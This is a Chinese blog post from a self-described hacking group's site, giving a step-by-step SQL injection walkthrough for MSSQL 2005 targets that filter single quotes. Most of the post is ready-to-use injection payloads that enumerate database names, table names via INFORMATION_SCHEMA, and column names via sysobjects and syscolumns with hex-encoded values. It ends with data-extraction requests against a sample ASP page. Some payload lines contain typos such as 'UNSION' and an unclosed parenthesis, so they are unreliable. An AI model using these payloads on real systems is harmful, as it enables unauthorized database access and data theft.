注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

SQL2005过滤单引号的注入方式  

2012-04-02 09:58:03|  分类: 渗透测试 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

mssql 2005
 
1:
 
and 1=(SELECT @@VERSION)-- 判断数据库版本
 
(master.dbo.sysdatabases 表存放着sql2005数据库系统的所有的数据库信息
 
查询命令:user master;
          SELECT * FROM MASTER.DBO.SYSDATABASES
 
系统默认的数据库有:1master  2tempdb 3model 4msdb)
 
2:dbid变量爆数据库名称
 
AND 1 IN (SELECT NAME FROM MASTER.DBO.SYSDATABASES WHERE DBID=3)
 
改变DBID值依次爆出!到无法爆出位置~!
 
3:获取表明
 
(MSSQL2005 每个数据库都有一个用来存放表明信息的表,PUBLIC权限即可查询!
表明为:INFORMATION_SCHEMA.TABLES
 
USE MASTER ;
SELECT * FROM INFORMATION_SCHEMA.TABLES;
 
INFORMATION_SCHEMA.TABLES表的机构:
 
                 TABLE_NAME
1                  XXX
2                  XXX
3                  XXX
...
 
而表明就存在TABLE_NAME的列里)
 
4:TOP 1爆出表名
 
   AND 1 IN (SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)
 
   更换TOP 1  即可爆出其它的。
 
5:获取爆出表的内容  加上条件语句:where table_name!=0XXXXX  (0xxx为上一步你爆出表明的16进制!)
 
   AND 1 IN (SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLENAME!=0XXXXX)
 
 
6:爆列名了
 
   MSSQL2005   SYS.ALL_OBJECTS表里存放着表与列的信息,表的列明:其列名OBJECT_ID里存放着一个数值,对应着另一个表名SYS.ALL_COLUMNS里的列明的ID,而SYS.ALL_COLUMNS表里存放着列的信息
 
执行:select * from sys.all_objects
 
表的机构
 
    name   object_id   xxx_id   schema_id  xxx_id
1  sysXXX     12
2  sysXXX      8
3
4
 
由结构可知,列名name和列名object_id是有对应的。注入时,通过指定的name值爆指定表的object_id值
 
AND 999999< (SELECT TOP 1 CAST([OBJECT_ID] AS NVARCHAR(20)) FROM SYS.ALL_OBJECTS WHERE NAME=0XXX
 
 
但是此句无法爆出数据值,用折半法来进行猜解,由于其数值都在10位以上,所有,其法也不太可能,但是可以联合两张表来直接查询,在此提交:
 
AND 9 IN (SELECT B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.NAME=0XXXXXXX)--
 
就可以爆出0xxxxx的第一个列名,可以加入条件
 
'and B.NAME!=0X  0X为已爆出的列名,类推可以一次爆出。
 
AND 9 IN(SELECT B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.NAME=0XXXXX AND B.NAME!=0XBBBBBB)--
 
最终:
 
表名和列名爆完后:,获取值就很简单
 
例如:   xch40.asp?id=1 and 77=(select ascii(@@VERSION))
         xch40.asp?id=1 and 1=2 UNSION SELECT 1,2,3,4...@VERSION--...
  评论这张
 
阅读(1106)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016